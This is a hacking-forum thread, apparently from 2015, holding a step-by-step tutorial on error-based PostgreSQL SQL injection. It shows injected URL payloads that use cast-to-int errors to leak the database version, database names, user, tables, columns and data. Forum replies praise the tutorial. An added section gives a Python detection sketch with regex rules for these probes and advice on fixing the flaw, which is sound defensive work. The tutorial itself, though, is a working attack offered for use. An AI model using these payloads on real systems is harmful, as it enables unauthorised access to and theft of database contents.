SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki

PostgreSQL Injection (Error Base) - rootxforce - 10-17-2015

Let's start.

1st, we find the error:
Code: localhost/index.cfm?MenuID=80'


ERROR: syntax error at or near "''"
It means this website can be injectable.

2nd, column count:
Code:  localhost/index.cfm?MenuID=80 order by 1--

Error Executing Database Query.
ERROR: ORDER BY position 2 is not in select list
That error shows that there is one column.

We will try with a UNION SELECT query:
Code:
localhost/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.
ERROR: UNION types character varying and integer cannot be matched

So it's not working!!!

OK, now let's try error-based PostgreSQL SQLi…

Try to find the version:
Code:
localhost/index.cfm?MenuID=80 and 1=cast(version() as int)--

Yes! Success:
CDbCommand gagal menjalankan statementSQL: SQLSTATE[22P02]: Invalid text representation: 7 ERROR: invalid input syntax for integer: "PostgreSQL 8.4.20 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-4), 64-bit" 

So finally we got the version.

OK, now let's try to get the database name with an error:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR:  invalid input syntax for integer: "template1" 
template1 is the database name.

template1 is the first database; we can get others by changing the offset.
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.
ERROR: invalid input syntax for integer: "template0"
template0 is the 2nd database, so you can increase the offset till you get an error.

OK, now try to find the user:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--


ERROR: invalid input syntax for integer: "hilal_db_user" 

hilal_db_user is the user.

Now try to find the table names.

4th step:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--


ERROR: invalid input syntax for integer: "pg_type" 

pg_type is the first table; we can get others by changing the offset.

5th step:

Now we have to find the columns from our specific table!

E.g. our table is pg_type.

For that we have to use Oracle char conversion: pg_type = CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

So our query is:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

ERROR: invalid input syntax for integer: "typname" 
And you can find other columns using offset.

Last step:
Now we have to extract data from our column:
Code:
localhost/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

ERROR: invalid input syntax for integer: "bool" 

Done. We have successfully injected.
Happy injecting.

/r00txf0rc3
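
Seen from the defending side, every step in the post above leaves two fingerprints: a cast-to-int wrapper (often with catalog names, CHR() chains and a LIMIT 1 OFFSET n walk) in the request, and an integer-cast error that quotes a non-numeric value in the PostgreSQL log. The following detection sketch is an added example, not part of the original post; the function names, rule names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request-side signatures of the probes in the post (matched after URL decoding).
REQUEST_RULES = {
    "cast_to_int_probe": re.compile(r"cast\s*\(.*\bas\s+int(eger)?\s*\)", re.I | re.S),
    "catalog_enumeration": re.compile(r"\b(pg_database|pg_type|information_schema\.\w+)", re.I),
    "chr_concat_string": re.compile(r"chr\s*\(\s*\d+\s*\)\s*\|\|\s*chr\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "limit_offset_walk": re.compile(r"\blimit\s+1\s+offset\s+\d+", re.I),
}
# Server-side signature; newer PostgreSQL releases say "for type integer".
PG_CAST_ERROR = re.compile(r'invalid input syntax for (?:type )?integer: "([^"]*)"')

def scan_request(url):
    """Return the sorted names of rules matched by any query-string value."""
    hits = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits.update(name for name, rx in REQUEST_RULES.items() if rx.search(value))
    return sorted(hits)

def leaked_values(pg_log_lines):
    """Return alphabetic strings that PostgreSQL echoed inside integer-cast errors."""
    out = []
    for line in pg_log_lines:
        m = PG_CAST_ERROR.search(line)
        if m and re.search(r"[A-Za-z]", m.group(1)):  # skip empty or digit-only values
            out.append(m.group(1))
    return out

# Constructed sample data (not taken from a real system).
SAMPLE_REQUESTS = [
    "/index.cfm?MenuID=80",
    "/index.cfm?MenuID=80%20and%201=cast(version()%20as%20int)--",
    "/index.cfm?MenuID=80+and+1=cast((select+datname+from+pg_database+limit+1+offset+1)+as+int)--",
]
SAMPLE_PG_LOG = [
    'ERROR:  invalid input syntax for integer: "template0"',
    'ERROR:  invalid input syntax for integer: ""',
    'ERROR:  syntax error at or near "\'\'"',
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(scan_request(req) or "clean", req)
    print("values echoed in cast errors:", leaked_values(SAMPLE_PG_LOG))
```

Detection complements the fix rather than replacing it: bind MenuID as a typed parameter (in ColdFusion, cfqueryparam with an integer cfsqltype) and serve generic error pages so database messages never reach the client.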


RE: PostgreSQL Injection (Error Base) - B3nG4L_Cyph3r - 10-17-2015

Nice share, thanks partner.


RE: PostgreSQL Injection (Error Base) - higgs_boson - 10-23-2015

Thanks for sharing.


RE: PostgreSQL Injection (Error Base) - Malik Ubi - 02-22-2016

Nice tutorial :-)